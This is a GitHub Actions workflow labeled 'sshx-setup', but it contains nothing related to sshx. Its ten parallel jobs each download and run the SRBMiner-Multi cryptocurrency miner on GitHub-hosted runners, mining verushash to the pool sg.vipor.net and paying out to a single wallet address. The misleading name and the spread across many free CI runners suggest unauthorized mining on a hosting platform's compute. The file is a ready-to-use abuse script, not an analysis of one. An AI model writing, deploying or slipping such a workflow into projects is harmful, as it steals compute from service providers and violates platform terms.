name: "sshx-setup"

on:
  workflow_dispatch:

jobs:
  pc1:
    name: "pc1"
    runs-on: ubuntu-latest
    steps:
      - name: setup 
        run: |
          export TERM=xterm
          
          cd && wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.6.7/SRBMiner-Multi-2-6-7-Linux.tar.gz 
          
          tar -xzvf SRBMiner-Multi-2-6-7-Linux.tar.gz 
          
          clear 
          
          cd SRBMiner-Multi-2-6-7 
          
          ./SRBMiner-MULTI --algorithm verushash --pool sg.vipor.net:5040 --wallet RStyQuDY1pSyWBMYdHMjn9hKgtGDnDfaXL --Worker pc151 --password x --cpu-threads 4

  pc2:
    name: "pc2"
    runs-on: ubuntu-latest
    steps:
      - name: setup 
        run: |
          export TERM=xterm && cd && wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.6.7/SRBMiner-Multi-2-6-7-Linux.tar.gz && tar -xzvf SRBMiner-Multi-2-6-7-Linux.tar.gz && clear && cd SRBMiner-Multi-2-6-7 && ./SRBMiner-MULTI --algorithm verushash --pool sg.vipor.net:5040 --wallet RStyQuDY1pSyWBMYdHMjn9hKgtGDnDfaXL --Worker pc152 --password x --cpu-threads 4
          
  pc3:
    name: "pc3"
    runs-on: ubuntu-latest
    steps:
      - name: setup 
        run: |
          export TERM=xterm && cd && wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.6.7/SRBMiner-Multi-2-6-7-Linux.tar.gz && tar -xzvf SRBMiner-Multi-2-6-7-Linux.tar.gz && clear && cd SRBMiner-Multi-2-6-7 && ./SRBMiner-MULTI --algorithm verushash --pool sg.vipor.net:5040 --wallet RStyQuDY1pSyWBMYdHMjn9hKgtGDnDfaXL --Worker pc153 --password x --cpu-threads 4

  pc4:
    name: "pc4"
    runs-on: ubuntu-latest
    steps:
      - name: setup 
        run: |
          export TERM=xterm && cd && wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.6.7/SRBMiner-Multi-2-6-7-Linux.tar.gz && tar -xzvf SRBMiner-Multi-2-6-7-Linux.tar.gz && clear && cd SRBMiner-Multi-2-6-7 && ./SRBMiner-MULTI --algorithm verushash --pool sg.vipor.net:5040 --wallet RStyQuDY1pSyWBMYdHMjn9hKgtGDnDfaXL --Worker pc154 --password x --cpu-threads 4

  pc5:
    name: "pc5"
    runs-on: ubuntu-latest
    steps:
      - name: setup 
        run: |
          export TERM=xterm && cd && wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.6.7/SRBMiner-Multi-2-6-7-Linux.tar.gz && tar -xzvf SRBMiner-Multi-2-6-7-Linux.tar.gz && clear && cd SRBMiner-Multi-2-6-7 && ./SRBMiner-MULTI --algorithm verushash --pool sg.vipor.net:5040 --wallet RStyQuDY1pSyWBMYdHMjn9hKgtGDnDfaXL --Worker pc155 --password x --cpu-threads 4

  pc6:
    name: "pc6"
    runs-on: ubuntu-latest
    steps:
      - name: setup 
        run: |
          export TERM=xterm && cd && wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.6.7/SRBMiner-Multi-2-6-7-Linux.tar.gz && tar -xzvf SRBMiner-Multi-2-6-7-Linux.tar.gz && clear && cd SRBMiner-Multi-2-6-7 && ./SRBMiner-MULTI --algorithm verushash --pool sg.vipor.net:5040 --wallet RStyQuDY1pSyWBMYdHMjn9hKgtGDnDfaXL --Worker pc156 --password x --cpu-threads 4

  pc7:
    name: "pc7"
    runs-on: ubuntu-22.04
    steps:
      - name: setup 
        run: |
          export TERM=xterm && cd && wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.6.7/SRBMiner-Multi-2-6-7-Linux.tar.gz && tar -xzvf SRBMiner-Multi-2-6-7-Linux.tar.gz && clear && cd SRBMiner-Multi-2-6-7 && ./SRBMiner-MULTI --algorithm verushash --pool sg.vipor.net:5040 --wallet RStyQuDY1pSyWBMYdHMjn9hKgtGDnDfaXL --Worker pc157 --password x --cpu-threads 4

  pc8:
    name: "pc8"
    runs-on: ubuntu-latest
    steps:
      - name: setup 
        run: |
          export TERM=xterm && cd && wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.6.7/SRBMiner-Multi-2-6-7-Linux.tar.gz && tar -xzvf SRBMiner-Multi-2-6-7-Linux.tar.gz && clear && cd SRBMiner-Multi-2-6-7 && ./SRBMiner-MULTI --algorithm verushash --pool sg.vipor.net:5040 --wallet RStyQuDY1pSyWBMYdHMjn9hKgtGDnDfaXL --Worker pc158 --password x --cpu-threads 4

  pc9:
    name: "pc9"
    runs-on: ubuntu-latest
    steps:
      - name: setup 
        run: |
          export TERM=xterm && cd && wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.6.7/SRBMiner-Multi-2-6-7-Linux.tar.gz && tar -xzvf SRBMiner-Multi-2-6-7-Linux.tar.gz && clear && cd SRBMiner-Multi-2-6-7 && ./SRBMiner-MULTI --algorithm verushash --pool sg.vipor.net:5040 --wallet RStyQuDY1pSyWBMYdHMjn9hKgtGDnDfaXL --Worker pc159 --password x --cpu-threads 4

  pc10:
    name: "pc10"
    runs-on: ubuntu-latest
    steps:
      - name: setup 
        run: |
          export TERM=xterm && cd && wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.6.7/SRBMiner-Multi-2-6-7-Linux.tar.gz && tar -xzvf SRBMiner-Multi-2-6-7-Linux.tar.gz && clear && cd SRBMiner-Multi-2-6-7 && ./SRBMiner-MULTI --algorithm verushash --pool sg.vipor.net:5040 --wallet RStyQuDY1pSyWBMYdHMjn9hKgtGDnDfaXL --Worker pc160 --password x --cpu-threads 4
